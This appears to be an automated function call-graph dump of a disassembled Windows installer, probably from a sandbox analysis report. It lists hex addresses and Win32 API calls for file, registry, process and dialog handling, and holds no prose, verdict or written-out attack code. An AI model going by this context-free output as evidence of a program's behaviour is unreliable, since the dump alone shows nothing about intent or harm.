4204->4205 4206 40287d 4204->4206 4207 4025fa FindClose 4205->4207 4207->4206 3722 40266e 3723 4029e8 18 API calls 3722->3723 3725 40267c 3723->3725 3724 402692 3727 40573d 2 API calls 3724->3727 3725->3724 3726 4029e8 18 API calls 3725->3726 3726->3724 3728 402698 3727->3728 3748 40575c GetFileAttributesA CreateFileA 3728->3748 3730 4026a5 3731 4026b1 GlobalAlloc 3730->3731 3732 40274e 3730->3732 3733 402745 CloseHandle 3731->3733 3734 4026ca 3731->3734 3735 402756 DeleteFileA 3732->3735 3736 402769 3732->3736 3733->3732 3749 4031da SetFilePointer 3734->3749 3735->3736 3738 4026d0 3739 4031a8 ReadFile 3738->3739 3740 4026d9 GlobalAlloc 3739->3740 3741 4026e9 3740->3741 3742 40271d WriteFile GlobalFree 3740->3742 3743 402f01 47 API calls 3741->3743 3744 402f01 47 API calls 3742->3744 3747 4026f6 3743->3747 3745 402742 3744->3745 3745->3733 3746 402714 GlobalFree 3746->3742 3747->3746 3748->3730 3749->3738 3750 40276f 3751 4029cb 18 API calls 3750->3751 3752 402775 3751->3752 3753 4027b0 3752->3753 3754 402799 3752->3754 3755 40264e 3752->3755 3758 4027c6 3753->3758 3759 4027ba 3753->3759 3756 4027ad 3754->3756 3757 40279e 3754->3757 3765 4059e3 wsprintfA 3756->3765 3764 405a85 lstrcpynA 3757->3764 3761 405aa7 18 API calls 3758->3761 3760 4029cb 18 API calls 3759->3760 3760->3755 3761->3755 3764->3755 3765->3755 4208 4014f0 SetForegroundWindow 4209 40287d 4208->4209 3766 404772 GetDlgItem GetDlgItem 3767 4047c6 7 API calls 3766->3767 3775 4049e3 3766->3775 3768 40486c DeleteObject 3767->3768 3769 40485f SendMessageA 3767->3769 3770 404877 3768->3770 3769->3768 3771 4048ae 3770->3771 3774 405aa7 18 API calls 3770->3774 3776 403e37 19 API calls 3771->3776 3772 404acd 3773 404b7c 3772->3773 3782 404b26 SendMessageA 3772->3782 3809 4049d6 3772->3809 3777 404b91 3773->3777 3778 404b85 SendMessageA 3773->3778 3779 404890 SendMessageA SendMessageA 3774->3779 3775->3772 3796 404a57 3775->3796 3819 4046f2 SendMessageA 3775->3819 3780 4048c2 3776->3780 3789 404ba3 ImageList_Destroy 3777->3789 3790 404baa 3777->3790 3798 404bba 3777->3798 3778->3777 3779->3770 3781 403e37 19 API calls 3780->3781 3797 4048d0 3781->3797 3787 404b3b SendMessageA 3782->3787 3782->3809 3783 403e9e 8 API calls 3788 404d6c 3783->3788 3784 404abf SendMessageA 3784->3772 3786 404d20 3794 404d32 ShowWindow GetDlgItem ShowWindow 3786->3794 3786->3809 3793 404b4e 3787->3793 3789->3790 3791 404bb3 GlobalFree 3790->3791 3790->3798 3791->3798 3792 4049a4 GetWindowLongA SetWindowLongA 3795 4049bd 3792->3795 3804 404b5f SendMessageA 3793->3804 3794->3809 3799 4049c3 ShowWindow 3795->3799 3800 4049db 3795->3800 3796->3772 3796->3784 3797->3792 3802 40491f SendMessageA 3797->3802 3805 40499e 3797->3805 3807 40495b SendMessageA 3797->3807 3808 40496c SendMessageA 3797->3808 3798->3786 3803 40140b 2 API calls 3798->3803 3813 404bec 3798->3813 3817 403e6c SendMessageA 3799->3817 3818 403e6c SendMessageA 3800->3818 3802->3797 3803->3813 3804->3773 3805->3792 3805->3795 3807->3797 3808->3797 3809->3783 3810 404cf6 InvalidateRect 3810->3786 3811 404d0c 3810->3811 3824 404610 3811->3824 3812 404c1a SendMessageA 3816 404c30 3812->3816 3813->3812 3813->3816 3815 404ca4 SendMessageA SendMessageA 3815->3816 3816->3810 3816->3815 3817->3809 3818->3775 3820 404751 SendMessageA 3819->3820 3821 404715 GetMessagePos ScreenToClient SendMessageA 3819->3821 3822 404749 3820->3822 3821->3822 3823 40474e 3821->3823 3822->3796 3823->3820 3825 40462a 3824->3825 3826 405aa7 18 API calls 3825->3826 3827 40465f 3826->3827 3828 405aa7 18 API calls 3827->3828 3829 40466a 3828->3829 3830 405aa7 18 API calls 3829->3830 3831 40469b lstrlenA wsprintfA SetDlgItemTextA 3830->3831 3831->3786 3832 404d73 3833 404d81 3832->3833 3834 404d98 3832->3834 3836 404d87 3833->3836 3850 404e01 3833->3850 3835 404da6 IsWindowVisible 3834->3835 3842 404dbd 3834->3842 3837 404db3 3835->3837 3835->3850 3839 403e83 SendMessageA 3836->3839 3840 4046f2 5 API calls 3837->3840 3838 404e07 CallWindowProcA 3841 404d91 3838->3841 3839->3841 3840->3842 3842->3838 3851 405a85 lstrcpynA 3842->3851 3844 404dec 3852 4059e3 wsprintfA 3844->3852 3846 404df3 3847 40140b 2 API calls 3846->3847 3848 404dfa 3847->3848 3853 405a85 lstrcpynA 3848->3853 3850->3838 3851->3844 3852->3846 3853->3850 3854 404275 3855 4042b3 3854->3855 3856 4042a6 3854->3856 3858 4042bc GetDlgItem 3855->3858 3864 40431f 3855->3864 3915 40532a GetDlgItemTextA 3856->3915 3860 4042d0 3858->3860 3859 4042ad 3862 405ce3 5 API calls 3859->3862 3866 4042e4 SetWindowTextA 3860->3866 3871 40560c 4 API calls 3860->3871 3861 404403 3863 40458f 3861->3863 3917 40532a GetDlgItemTextA 3861->3917 3862->3855 3870 403e9e 8 API calls 3863->3870 3864->3861 3864->3863 3867 405aa7 18 API calls 3864->3867 3869 403e37 19 API calls 3866->3869 3872 404395 SHBrowseForFolderA 3867->3872 3868 40442f 3873 405659 18 API calls 3868->3873 3874 404302 3869->3874 3875 4045a3 3870->3875 3876 4042da 3871->3876 3872->3861 3877 4043ad CoTaskMemFree 3872->3877 3878 404435 3873->3878 3879 403e37 19 API calls 3874->3879 3876->3866 3880 405578 3 API calls 3876->3880 3881 405578 3 API calls 3877->3881 3918 405a85 lstrcpynA 3878->3918 3882 404310 3879->3882 3880->3866 3883 4043ba 3881->3883 3916 403e6c SendMessageA 3882->3916 3886 4043f1 SetDlgItemTextA 3883->3886 3891 405aa7 18 API calls 3883->3891 3886->3861 3887 404318 3889 405da3 3 API calls 3887->3889 3888 40444c 3890 405da3 3 API calls 3888->3890 3889->3864 3898 404454 3890->3898 3892 4043d9 lstrcmpiA 3891->3892 3892->3886 3895 4043ea lstrcatA 3892->3895 3893 40448e 3919 405a85 lstrcpynA 3893->3919 3895->3886 3896 404497 3897 40560c 4 API calls 3896->3897 3899 40449d GetDiskFreeSpaceA 3897->3899 3898->3893 3901 4055bf 2 API calls 3898->3901 3903 4044e1 3898->3903 3902 4044bf MulDiv 3899->3902 3899->3903 3901->3898 3902->3903 3904 40453e 3903->3904 3905 404610 21 API calls 3903->3905 3906 404561 3904->3906 3908 40140b 2 API calls 3904->3908 3907 404530 3905->3907 3920 403e59 EnableWindow 3906->3920 3910 404540 SetDlgItemTextA 3907->3910 3911 404535 3907->3911 3908->3906 3910->3904 3913 404610 21 API calls 3911->3913 3912 40457d 3912->3863 3921 40420a 3912->3921 3913->3904 3915->3859 3916->3887 3917->3868 3918->3888 3919->3896 3920->3912 3922 404218 3921->3922 3923 40421d SendMessageA 3921->3923 3922->3923 3923->3863 4210 4022f5 4211 4022fb 4210->4211 4212 4029e8 18 API calls 4211->4212 4213 40230d 4212->4213 4214 4029e8 18 API calls 4213->4214 4215 402317 RegCreateKeyExA 4214->4215 4216 402341 4215->4216 4217 40287d 4215->4217 4218 402359 4216->4218 4219 4029e8 18 API calls 4216->4219 4220 402365 4218->4220 4222 4029cb 18 API calls 4218->4222 4221 402352 lstrlenA 4219->4221 4223 402380 RegSetValueExA 4220->4223 4224 402f01 47 API calls 4220->4224 4221->4218 4222->4220 4225 402396 RegCloseKey 4223->4225 4224->4223 4225->4217 4227 4027f5 4228 4029cb 18 API calls 4227->4228 4229 4027fb 4228->4229 4230 402809 4229->4230 4231 40282c 4229->4231 4232 40264e 4229->4232 4230->4232 4235 4059e3 wsprintfA 4230->4235 4231->4232 4233 405aa7 18 API calls 4231->4233 4233->4232 4235->4232 4236 4024f8 4237 4029cb 18 API calls 4236->4237 4240 402502 4237->4240 4238 402578 4239 402536 ReadFile 4239->4238 4239->4240 4240->4238 4240->4239 4241 40257a 4240->4241 4242 40258a 4240->4242 4245 4059e3 wsprintfA 4241->4245 4242->4238 4244 4025a0 SetFilePointer 4242->4244 4244->4238 4245->4238 4246 4016fa 4247 4029e8 18 API calls 4246->4247 4248 401701 SearchPathA 4247->4248 4249 40171c 4248->4249 4250 4014fe 4251 401506 4250->4251 4253 401519 4250->4253 4252 4029cb 18 API calls 4251->4252 4252->4253 3924 403f7f 3925 403f95 3924->3925 3933 4040a2 3924->3933 3927 403e37 19 API calls 3925->3927 3926 404111 3928 4041e5 3926->3928 3929 40411b GetDlgItem 3926->3929 3930 403feb 3927->3930 3935 403e9e 8 API calls 3928->3935 3931 404131 3929->3931 3932 4041a3 3929->3932 3934 403e37 19 API calls 3930->3934 3931->3932 3939 404157 6 API calls 3931->3939 3932->3928 3940 4041b5 3932->3940 3933->3926 3933->3928 3936 4040e6 GetDlgItem SendMessageA 3933->3936 3938 403ff8 CheckDlgButton 3934->3938 3947 4041e0 3935->3947 3955 403e59 EnableWindow 3936->3955 3953 403e59 EnableWindow 3938->3953 3939->3932 3943 4041bb SendMessageA 3940->3943 3944 4041cc 3940->3944 3941 40410c 3945 40420a SendMessageA 3941->3945 3943->3944 3944->3947 3948 4041d2 SendMessageA 3944->3948 3945->3926 3946 404016 GetDlgItem 3954 403e6c SendMessageA 3946->3954 3948->3947 3950 40402c SendMessageA 3951 404053 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3950->3951 3952 40404a GetSysColor 3950->3952 3951->3947 3952->3951 3953->3946 3954->3950 3955->3941 3956 401000 3957 401037 BeginPaint GetClientRect 3956->3957 3958 40100c DefWindowProcA 3956->3958 3960 4010f3 3957->3960 3961 401179 3958->3961 3962 401073 CreateBrushIndirect FillRect DeleteObject 3960->3962 3963 4010fc 3960->3963 3962->3960 3964 401102 CreateFontIndirectA 3963->3964 3965 401167 EndPaint 3963->3965 3964->3965 3966 401112 6 API calls 3964->3966 3965->3961 3966->3965 3967 401b06 3968 401b13 3967->3968 3969 401b57 3967->3969 3972 4021ed 3968->3972 3977 401b2a 3968->3977 3970 401b80 GlobalAlloc 3969->3970 3971 401b5b 3969->3971 3973 405aa7 18 API calls 3970->3973 3985 401b9b 3971->3985 3988 405a85 lstrcpynA 3971->3988 3974 405aa7 18 API calls 3972->3974 3973->3985 3976 4021fa 3974->3976 3980 405346 MessageBoxIndirectA 3976->3980 3986 405a85 lstrcpynA 3977->3986 3978 401b6d GlobalFree 3978->3985 3980->3985 3981 401b39 3987 405a85 lstrcpynA 3981->3987 3983 401b48 3989 405a85 lstrcpynA 3983->3989 3986->3981 3987->3983 3988->3978 3989->3985 3990 402607 3991 40260a 3990->3991 3993 402622 3990->3993 3992 402617 FindNextFileA 3991->3992 3992->3993 3994 402661 3992->3994 3996 405a85 lstrcpynA 3994->3996 3996->3993 3515 401389 3517 401390 3515->3517 3516 4013fe 3517->3516 3518 4013cb MulDiv SendMessageA 3517->3518 3518->3517 4268 401c8a 4269 4029cb 18 API calls 4268->4269 4270 401c91 4269->4270 4271 4029cb 18 API calls 4270->4271 4272 401c99 GetDlgItem 4271->4272 4273 4024aa 4272->4273 4274 40248e 4275 4029e8 18 API calls 4274->4275 4276 402495 4275->4276 4279 40575c GetFileAttributesA CreateFileA 4276->4279 4278 4024a1 4279->4278 4004 402012 4005 4029e8 18 API calls 4004->4005 4006 402019 4005->4006 4007 4029e8 18 API calls 4006->4007 4008 402023 4007->4008 4009 4029e8 18 API calls 4008->4009 4010 40202c 4009->4010 4011 4029e8 18 API calls 4010->4011 4012 402036 4011->4012 4013 4029e8 18 API calls 4012->4013 4015 402040 4013->4015 4014 402054 CoCreateInstance 4019 402073 4014->4019 4020 402129 4014->4020 4015->4014 4016 4029e8 18 API calls 4015->4016 4016->4014 4017 401423 25 API calls 4018 40215b 4017->4018 4019->4020 4021 402108 MultiByteToWideChar 4019->4021 4020->4017 4020->4018 4021->4020 4022 402215 4023 402223 4022->4023 4024 40221d 4022->4024 4026 402233 4023->4026 4027 4029e8 18 API calls 4023->4027 4025 4029e8 18 API calls 4024->4025 4025->4023 4028 4029e8 18 API calls 4026->4028 4030 402241 4026->4030 4027->4026 4028->4030 4029 4029e8 18 API calls 4031 40224a WritePrivateProfileStringA 4029->4031 4030->4029 4280 401e95 4281 4029e8 18 API calls 4280->4281 4282 401e9c 4281->4282 4283 405d7c 2 API calls 4282->4283 4284 401ea2 4283->4284 4286 401eb4 4284->4286 4287 4059e3 wsprintfA 4284->4287 4287->4286 4288 401595 4289 4029e8 18 API calls 4288->4289 4290 40159c SetFileAttributesA 4289->4290 4291 4015ae 4290->4291 4292 401d95 4293 4029cb 18 API calls 4292->4293 4294 401d9b 4293->4294 4295 4029cb 18 API calls 4294->4295 4296 401da4 4295->4296 4297 401db6 EnableWindow 4296->4297 4298 401dab ShowWindow 4296->4298 4299 40287d 4297->4299 4298->4299 4300 401696 4301 4029e8 18 API calls 4300->4301 4302 40169c GetFullPathNameA 4301->4302 4303 4016b3 4302->4303 4304 4016d4 4302->4304 4303->4304 4307 405d7c 2 API calls 4303->4307 4305 4016e8 GetShortPathNameA 4304->4305 4306 40287d 4304->4306 4305->4306 4308 4016c4 4307->4308 4308->4304 4310 405a85 lstrcpynA 4308->4310 4310->4304 4032 402419 4042 402af2 4032->4042 4034 402423 4035 4029cb 18 API calls 4034->4035 4036 40242c 4035->4036 4037 402443 RegEnumKeyA 4036->4037 4038 40244f RegEnumValueA 4036->4038 4039 40264e 4036->4039 4040 402468 RegCloseKey 4037->4040 4038->4039 4038->4040 4040->4039 4043 4029e8 18 API calls 4042->4043 4044 402b0b 4043->4044 4045 402b19 RegOpenKeyExA 4044->4045 4045->4034 4318 402299 4319 4022c9 4318->4319 4320 40229e 4318->4320 4322 4029e8 18 API calls 4319->4322 4321 402af2 19 API calls 4320->4321 4323 4022a5 4321->4323 4324 4022d0 4322->4324 4325 4022e6 4323->4325 4326 4029e8 18 API calls 4323->4326 4329 402a28 RegOpenKeyExA 4324->4329 4328 4022b6 RegDeleteValueA RegCloseKey 4326->4328 4328->4325 4333 402a53 4329->4333 4338 402a9f 4329->4338 4330 402a79 RegEnumKeyA 4331 402a8b RegCloseKey 4330->4331 4330->4333 4334 405da3 3 API calls 4331->4334 4332 402ab0 RegCloseKey 4332->4338 4333->4330 4333->4331 4333->4332 4335 402a28 3 API calls 4333->4335 4336 402a9b 4334->4336 4335->4333 4337 402acb RegDeleteKeyA 4336->4337 4336->4338 4337->4338 4338->4325 4046 401e1b 4047 4029e8 18 API calls 4046->4047 4048 401e21 4047->4048 4049 404e23 25 API calls 4048->4049 4050 401e2b 4049->4050 4051 4052e5 2 API calls 4050->4051 4055 401e31 4051->4055 4052 401e87 CloseHandle 4054 40264e 4052->4054 4053 401e50 WaitForSingleObject 4053->4055 4056 401e5e GetExitCodeProcess 4053->4056 4055->4052 4055->4053 4055->4054 4057 405ddc 2 API calls 4055->4057 4058 401e70 4056->4058 4059 401e79 4056->4059 4057->4053 4061 4059e3 wsprintfA 4058->4061 4059->4052 4061->4059 4062 401d1b GetDC GetDeviceCaps 4063 4029cb 18 API calls 4062->4063 4064 401d37 MulDiv 4063->4064 4065 4029cb 18 API calls 4064->4065 4066 401d4c 4065->4066 4067 405aa7 18 API calls 4066->4067 4068 401d85 CreateFontIndirectA 4067->4068 4069 4024aa 4068->4069 3052 401721 3053 4029e8 18 API calls 3052->3053 3054 401728 3053->3054 3058 40578b 3054->3058 3056 40172f 3057 40578b 2 API calls 3056->3057 3057->3056 3059 405796 GetTickCount GetTempFileNameA 3058->3059 3060 4057c2 3059->3060 3061 4057c6 3059->3061 3060->3059 3060->3061 3061->3056 4339 4023a1 4340 402af2 19 API calls 4339->4340 4341 4023ab 4340->4341 4342 4029e8 18 API calls 4341->4342 4343 4023b4 4342->4343 4344 4023be RegQueryValueExA 4343->4344 4347 40264e 4343->4347 4345 4023de 4344->4345 4346 4023e4 RegCloseKey 4344->4346 4345->4346 4350 4059e3 wsprintfA 4345->4350 4346->4347 4350->4346 4070 401922 4071 4029e8 18 API calls 4070->4071 4072 401929 lstrlenA 4071->4072 4073 4024aa 4072->4073 3201 403225 #17 SetErrorMode OleInitialize 3271 405da3 GetModuleHandleA 3201->3271 3205 403293 GetCommandLineA 3276 405a85 lstrcpynA 3205->3276 3207 4032a5 GetModuleHandleA 3208 4032bc 3207->3208 3209 4055a3 CharNextA 3208->3209 3210 4032d0 CharNextA 3209->3210 3216 4032dd 3210->3216 3211 403346 3212 403359 GetTempPathA 3211->3212 3277 4031f1 3212->3277 3214 40336f 3217 403393 DeleteFileA 3214->3217 3218 403373 GetWindowsDirectoryA lstrcatA 3214->3218 3215 4055a3 CharNextA 3215->3216 3216->3211 3216->3215 3221 403348 3216->3221 3285 402c5b GetTickCount GetModuleFileNameA 3217->3285 3219 4031f1 11 API calls 3218->3219 3223 40338f 3219->3223 3370 405a85 lstrcpynA 3221->3370 3222 4033a4 3224 40340d 3222->3224 3226 4033fd 3222->3226 3229 4055a3 CharNextA 3222->3229 3223->3217 3223->3224 3387 4035a6 3224->3387 3315 4035e3 3226->3315 3231 4033bb 3229->3231 3240 4033d8 3231->3240 3241 40343c lstrcatA lstrcmpiA 3231->3241 3232 403426 3235 405346 MessageBoxIndirectA 3232->3235 3233 40350b 3234 40358e ExitProcess 3233->3234 3236 405da3 3 API calls 3233->3236 3238 403434 ExitProcess 3235->3238 3239 40351a 3236->3239 3242 405da3 3 API calls 3239->3242 3371 405659 3240->3371 3241->3224 3244 403458 CreateDirectoryA SetCurrentDirectoryA 3241->3244 3245 403523 3242->3245 3247 40347a 3244->3247 3248 40346f 3244->3248 3249 405da3 3 API calls 3245->3249 3395 405a85 lstrcpynA 3247->3395 3394 405a85 lstrcpynA 3248->3394 3252 40352c 3249->3252 3254 40357a ExitWindowsEx 3252->3254 3261 40353a GetCurrentProcess 3252->3261 3254->3234 3257 403587 3254->3257 3255 4033f2 3386 405a85 lstrcpynA 3255->3386 3256 405aa7 18 API calls 3259 4034aa DeleteFileA 3256->3259 3425 40140b 3257->3425 3262 4034b7 CopyFileA 3259->3262 3268 403488 3259->3268 3263 40354a 3261->3263 3262->3268 3263->3254 3264 4034ff 3266 4057d3 38 API calls 3264->3266 3266->3224 3267 405aa7 18 API calls 3267->3268 3268->3256 3268->3264 3268->3267 3270 4034eb CloseHandle 3268->3270 3396 4057d3 3268->3396 3422 4052e5 CreateProcessA 3268->3422 3270->3268 3272 405dca GetProcAddress 3271->3272 3273 405dbf LoadLibraryA 3271->3273 3274 403268 SHGetFileInfoA 3272->3274 3273->3272 3273->3274 3275 405a85 lstrcpynA 3274->3275 3275->3205 3276->3207 3278 405ce3 5 API calls 3277->3278 3280 4031fd 3278->3280 3279 403207 3279->3214 3280->3279 3281 405578 3 API calls 3280->3281 3282 40320f CreateDirectoryA 3281->3282 3283 40578b 2 API calls 3282->3283 3284 403223 3283->3284 3284->3214 3428 40575c GetFileAttributesA CreateFileA 3285->3428 3287 402c9e 3314 402cab 3287->3314 3429 405a85 lstrcpynA 3287->3429 3289 402cc1 3430 4055bf lstrlenA 3289->3430 3293 402cd2 GetFileSize 3294 402dd3 3293->3294 3312 402ce9 3293->3312 3295 402bc5 32 API calls 3294->3295 3296 402dda 3295->3296 3299 402e16 GlobalAlloc 3296->3299 3296->3314 3435 4031da SetFilePointer 3296->3435 3297 4031a8 ReadFile 3297->3312 3298 402e6e 3301 402bc5 32 API calls 3298->3301 3300 402e2d 3299->3300 3305 40578b 2 API calls 3300->3305 3301->3314 3303 402df7 3306 4031a8 ReadFile 3303->3306 3304 402bc5 32 API calls 3304->3312 3307 402e3e CreateFileA 3305->3307 3308 402e02 3306->3308 3309 402e78 3307->3309 3307->3314 3308->3299 3308->3314 3436 4031da SetFilePointer 3309->3436 3311 402e86 3313 402f01 47 API calls 3311->3313 3312->3294 3312->3297 3312->3298 3312->3304 3312->3314 3313->3314 3314->3222 3316 405da3 3 API calls 3315->3316 3317 4035f7 3316->3317 3318 4035fd GetUserDefaultUILanguage 3317->3318 3319 40360f 3317->3319 3437 4059e3 wsprintfA 3318->3437 3321 40596c 3 API calls 3319->3321 3323 403630 3321->3323 3322 40360d 3438 403897 3322->3438 3324 40364e lstrcatA 3323->3324 3325 40596c 3 API calls 3323->3325 3324->3322 3325->3324 3328 405659 18 API calls 3329 403676 3328->3329 3330 4036ff 3329->3330 3332 40596c 3 API calls 3329->3332 3331 405659 18 API calls 3330->3331 3333 403705 3331->3333 3334 4036a2 3332->3334 3335 403715 LoadImageA 3333->3335 3336 405aa7 18 API calls 3333->3336 3334->3330 3339 4036be lstrlenA 3334->3339 3342 4055a3 CharNextA 3334->3342 3337 403740 RegisterClassA 3335->3337 3338 4037c9 3335->3338 3336->3335 3340 40377c SystemParametersInfoA CreateWindowExA 3337->3340 3346 4037d3 3337->3346 3341 40140b 2 API calls 3338->3341 3343 4036f2 3339->3343 3344 4036cc lstrcmpiA 3339->3344 3340->3338 3345 4037cf 3341->3345 3348 4036bc 3342->3348 3347 405578 3 API calls 3343->3347 3344->3343 3349 4036dc GetFileAttributesA 3344->3349 3345->3346 3350 403897 19 API calls 3345->3350 3346->3224 3351 4036f8 3347->3351 3348->3339 3352 4036e8 3349->3352 3354 4037e0 3350->3354 3447 405a85 lstrcpynA 3351->3447 3352->3343 3353 4055bf 2 API calls 3352->3353 3353->3343 3356 403864 3354->3356 3357 4037e8 ShowWindow LoadLibraryA 3354->3357 3448 404ef5 OleInitialize 3356->3448 3358 403807 LoadLibraryA 3357->3358 3359 40380e GetClassInfoA 3357->3359 3358->3359 3361 403822 GetClassInfoA RegisterClassA 3359->3361 3362 403838 DialogBoxParamA 3359->3362 3361->3362 3364 40140b 2 API calls 3362->3364 3363 40386a 3365 403886 3363->3365 3366 40386e 3363->3366 3368 403860 3364->3368 3367 40140b 2 API calls 3365->3367 3366->3346 3369 40140b 2 API calls 3366->3369 3367->3346 3368->3346 3369->3346 3370->3212 3463 405a85 lstrcpynA 3371->3463 3373 40566a 3374 40560c 4 API calls 3373->3374 3375 405670 3374->3375 3376 4033e3 3375->3376 3377 405ce3 5 API calls 3375->3377 3376->3224 3385 405a85 lstrcpynA 3376->3385 3383 405680 3377->3383 3378 4056ab lstrlenA 3379 4056b6 3378->3379 3378->3383 3380 405578 3 API calls 3379->3380 3382 4056bb GetFileAttributesA 3380->3382 3381 405d7c 2 API calls 3381->3383 3382->3376 3383->3376 3383->3378 3383->3381 3384 4055bf 2 API calls 3383->3384 3384->3378 3385->3255 3386->3226 3388 4035c1 3387->3388 3389 4035b7 CloseHandle 3387->3389 3390 4035d5 3388->3390 3391 4035cb CloseHandle 3388->3391 3389->3388 3464 4053aa 3390->3464 3391->3390 3394->3247 3395->3268 3397 405da3 3 API calls 3396->3397 3398 4057de 3397->3398 3399 40583b GetShortPathNameA 3398->3399 3402 405930 3398->3402 3507 40575c GetFileAttributesA CreateFileA 3398->3507 3401 405850 3399->3401 3399->3402 3401->3402 3404 405858 wsprintfA 3401->3404 3402->3268 3403 40581f CloseHandle GetShortPathNameA 3403->3402 3406 405833 3403->3406 3405 405aa7 18 API calls 3404->3405 3407 405880 3405->3407 3406->3399 3406->3402 3508 40575c GetFileAttributesA CreateFileA 3407->3508 3409 40588d 3409->3402 3410 40589c GetFileSize GlobalAlloc 3409->3410 3411 405929 CloseHandle 3410->3411 3412 4058ba ReadFile 3410->3412 3411->3402 3412->3411 3413 4058ce 3412->3413 3413->3411 3509 4056d1 lstrlenA 3413->3509 3416 4058e3 3514 405a85 lstrcpynA 3416->3514 3417 40593d 3418 4056d1 4 API calls 3417->3418 3420 4058f1 3418->3420 3421 405904 SetFilePointer WriteFile GlobalFree 3420->3421 3421->3411 3423 405320 3422->3423 3424 405314 CloseHandle 3422->3424 3423->3268 3424->3423 3426 401389 2 API calls 3425->3426 3427 401420 3426->3427 3427->3234 3428->3287 3429->3289 3431 4055cc 3430->3431 3432 4055d1 CharPrevA 3431->3432 3433 402cc7 3431->3433 3432->3431 3432->3433 3434 405a85 lstrcpynA 3433->3434 3434->3293 3435->3303 3436->3311 3437->3322 3439 4038ab 3438->3439 3455 4059e3 wsprintfA 3439->3455 3441 40391c 3442 405aa7 18 API calls 3441->3442 3443 403928 SetWindowTextA 3442->3443 3444 40365e 3443->3444 3445 403944 3443->3445 3444->3328 3445->3444 3446 405aa7 18 API calls 3445->3446 3446->3445 3447->3330 3456 403e83 3448->3456 3450 404f3f 3451 403e83 SendMessageA 3450->3451 3453 404f51 OleUninitialize 3451->3453 3452 404f18 3452->3450 3459 401389 3452->3459 3453->3363 3455->3441 3457 403e9b 3456->3457 3458 403e8c SendMessageA 3456->3458 3457->3452 3458->3457 3461 401390 3459->3461 3460 4013fe 3460->3452 3461->3460 3462 4013cb MulDiv SendMessageA 3461->3462 3462->3461 3463->3373 3465 405659 18 API calls 3464->3465 3466 4053be 3465->3466 3467 4053c7 DeleteFileA 3466->3467 3468 4053de 3466->3468 3469 403416 OleUninitialize 3467->3469 3470 40551d 3468->3470 3505 405a85 lstrcpynA 3468->3505 3469->3232 3469->3233 3470->3469 3476 405d7c 2 API calls 3470->3476 3472 405408 3473 405419 3472->3473 3474 40540c lstrcatA 3472->3474 3475 4055bf 2 API calls 3473->3475 3477 40541f 3474->3477 3475->3477 3479 405538 3476->3479 3478 40542d lstrcatA 3477->3478 3480 405438 lstrlenA FindFirstFileA 3477->3480 3478->3480 3479->3469 3482 405578 3 API calls 3479->3482 3481 405513 3480->3481 3502 40545c 3480->3502 3481->3470 3484 405542 3482->3484 3483 4055a3 CharNextA 3483->3502 3485 40573d 2 API calls 3484->3485 3486 405548 RemoveDirectoryA 3485->3486 3487 405553 3486->3487 3488 40556a 3486->3488 3487->3469 3489 405559 3487->3489 3490 404e23 25 API calls 3488->3490 3493 404e23 25 API calls 3489->3493 3490->3469 3491 4054f2 FindNextFileA 3494 40550a FindClose 3491->3494 3491->3502 3495 405561 3493->3495 3494->3481 3496 4057d3 38 API calls 3495->3496 3499 405568 3496->3499 3497 40573d 2 API calls 3500 4054bf DeleteFileA 3497->3500 3498 4053aa 59 API calls 3498->3502 3499->3469 3500->3502 3501 404e23 25 API calls 3501->3491 3502->3483 3502->3491 3502->3497 3502->3498 3502->3501 3503 404e23 25 API calls 3502->3503 3504 4057d3 38 API calls 3502->3504 3506 405a85 lstrcpynA 3502->3506 3503->3502 3504->3502 3505->3472 3506->3502 3507->3403 3508->3409 3510 405707 lstrlenA 3509->3510 3511 405711 3510->3511 3512 4056e5 lstrcmpiA 3510->3512 3511->3416 3511->3417 3512->3511 3513 4056fe CharNextA 3512->3513 3513->3510 3514->3420 4351 401ca5 4352 4029cb 18 API calls 4351->4352 4353 401cb5 SetWindowLongA 4352->4353 4354 40287d 4353->4354 4074 401a26 4075 4029cb 18 API calls 4074->4075 4076 401a2c 4075->4076 4077 4029cb 18 API calls 4076->4077 4078 4019d6 4077->4078 4355 4045aa 4356 4045d6 4355->4356 4357 4045ba 4355->4357 4359 404609 4356->4359 4360 4045dc SHGetPathFromIDListA 4356->4360 4366 40532a GetDlgItemTextA 4357->4366 4362 4045ec 4360->4362 4365 4045f3 SendMessageA 4360->4365 4361 4045c7 SendMessageA 4361->4356 4363 40140b 2 API calls 4362->4363 4363->4365 4365->4359 4366->4361 4079 402b2d 4080 402b55 4079->4080 4081 402b3c SetTimer 4079->4081 4082 402ba3 4080->4082 4083 402ba9 MulDiv 4080->4083 4081->4080 4084 402b63 wsprintfA SetWindowTextA SetDlgItemTextA 4083->4084 4084->4082 4367 401bad 4368 4029cb 18 API calls 4367->4368 4369 401bb4 4368->4369 4370 4029cb 18 API calls 4369->4370 4371 401bbe 4370->4371 4372 401bce 4371->4372 4373 4029e8 18 API calls 4371->4373 4374 4029e8 18 API calls 4372->4374 4377 401bde 4372->4377 4373->4372 4374->4377 4375 401be9 4378 4029cb 18 API calls 4375->4378 4376 401c2d 4379 4029e8 18 API calls 4376->4379 4377->4375 4377->4376 4380 401bee 4378->4380 4381 401c32 4379->4381 4382 4029cb 18 API calls 4380->4382 4383 4029e8 18 API calls 4381->4383 4384 401bf7 4382->4384 4385 401c3b FindWindowExA 4383->4385 4386 401c1d SendMessageA 4384->4386 4387 401bff SendMessageTimeoutA 4384->4387 4388 401c59 4385->4388 4386->4388 4387->4388 4086 40422e 4087 404264 4086->4087 4088 40423e 4086->4088 4089 403e9e 8 API calls 4087->4089 4090 403e37 19 API calls 4088->4090 4091 404270 4089->4091 4092 40424b SetDlgItemTextA 4090->4092 4092->4087 4093 402630 4094 4029e8 18 API calls 4093->4094 4095 402637 FindFirstFileA 4094->4095 4096 40265a 4095->4096 4100 40264a 4095->4100 4097 402661 4096->4097 4101 4059e3 wsprintfA 4096->4101 4102 405a85 lstrcpynA 4097->4102 4101->4097 4102->4100 4389 4024b0 4390 4024b5 4389->4390 4391 4024c6 4389->4391 4392 4029cb 18 API calls 4390->4392 4393 4029e8 18 API calls 4391->4393 4395 4024bc 4392->4395 4394 4024cd lstrlenA 4393->4394 4394->4395 4396 4024ec WriteFile 4395->4396 4397 40264e 4395->4397 4396->4397 3062 4015b3 3063 4029e8 18 API calls 3062->3063 3064 4015ba 3063->3064 3080 40560c CharNextA CharNextA 3064->3080 3066 40160a 3067 40162d 3066->3067 3068 40160f 3066->3068 3075 401423 25 API calls 3067->3075 3070 401423 25 API calls 3068->3070 3069 4055a3 CharNextA 3071 4015d0 CreateDirectoryA 3069->3071 3072 401616 3070->3072 3073 4015c2 3071->3073 3074 4015e5 GetLastError 3071->3074 3086 405a85 lstrcpynA 3072->3086 